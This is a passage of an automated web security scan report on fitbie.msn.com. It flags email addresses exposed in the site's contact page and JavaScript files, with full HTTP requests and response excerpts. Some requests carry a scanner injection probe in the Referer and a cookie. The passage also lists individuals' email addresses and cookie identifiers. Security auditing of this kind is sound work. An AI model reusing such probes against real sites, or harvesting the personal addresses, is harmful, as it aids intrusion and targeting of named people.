_HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

6. Email addresses disclosed previous
There are 4 instances of this issue:

/contact
/sites/all/modules/quicktabs/js/quicktabs.js
/sites/all/themes/fitlife/javascripts/jquery.cookie.js
/sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

6.1. http://fitbie.msn.com/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/contact

Issue detail

The following email addresses were disclosed in the response:

Allison.Falkenberry@Rodale.com
Karen.Shosfy@Rodale.com
editors@fitbie.com
support@fitbie.com
weightloss@fitbie.com

Request

GET /contact HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

6.2. http://fitbie.msn.com/sites/all/modules/quicktabs/js/quicktabs.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/quicktabs/js/quicktabs.js

Issue detail

The following email address was disclosed in the response:

mgalvin@northps.com

Request

GET /sites/all/modules/quicktabs/js/quicktabs.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
Last-Modified: Wed, 29 Dec 2010 20:20:18 GMT
ETag: "e810b-1962-498924c348480"
Accept-Ranges: bytes
Content-Length: 6498
Content-Type: application/javascript
Cache-Control: max-age=959941
Expires: Thu, 24 Feb 2011 16:56:46 GMT
Date: Sun, 13 Feb 2011 14:17:45 GMT
Connection: close

// $Id: quicktabs.js,v 1.3.2.18 2009/09/29 03:02:37 pasqualle Exp $

Drupal.settings.views = Drupal.settings.views || {'ajax_path': 'views/ajax'};

Drupal.behaviors.quicktabs = function (context) {

...[SNIP]...
g(el.id.indexOf('-') +1);

$(el).find('ul.quicktabs_tabs li a').each(function(){
this.myTabIndex = i++;
this.qtid = qtid;
// This one line change made for Rodale MSN FitLife #CORE HACK - mgalvin@northps.com
//$(this).bind('click', quicktabsClick);
$(this).bind('mouseover', quicktabsClick);
});

// Search for the active tab.
var $active_tab = $(el).children('.quicktabs_tabs').find('li.active a');

if ($active_tab.hasClass('qt_tab') || $active_tab.hasClass('qt_ajax_tab')) {
// This one line change made for Rodale MSN FitLife #CORE HACK - mgalvin@northps.com
//$active_tab.trigger('click');
$active_tab.trigger('mouseover');
}
else {
// Click on the first tab.
// This one line change made for Rodale MSN FitLife #CORE HACK - mgalvin@northps.com
//$(el).children('.quicktabs_tabs').find('li.first a').trigger('click');
$(el).children('.quicktabs_tabs').find('li.first a').trigger('mouseover');
}
return false;
}

// constructor for an
...[SNIP]...

6.3. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/sites/all/themes/fitlife/javascripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /sites/all/themes/fitlife/javascripts/jquery.cookie.js HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
Last-Modified: Mon, 07 Feb 2011 18:17:30 GMT
ETag: "ac79a-1096-49bb53eb0c280"
Accept-Ranges: bytes
Content-Length: 4246
Content-Type: application/javascript
Cache-Control: max-age=739377
Expires: Tue, 22 Feb 2011 03:40:43 GMT
Date: Sun, 13 Feb 2011 14:17:46 GMT
Connection: close

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

6.4. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
Last-Modified: Wed, 29 Dec 2010 20:19:48 GMT
ETag: "e8539-646-498924a6ac100"
Accept-Ranges: bytes
Content-Length: 1606
Content-Type: application/javascript
Cache-Control: max-age=959944
Expires: Thu, 24 Feb 2011 16:56:49 GMT
Date: Sun, 13 Feb 2011 14:17:45 GMT
Connection: close

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @param
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

Report generated by XSS.CX at Sun Feb 13 08:40:53 CST 2011.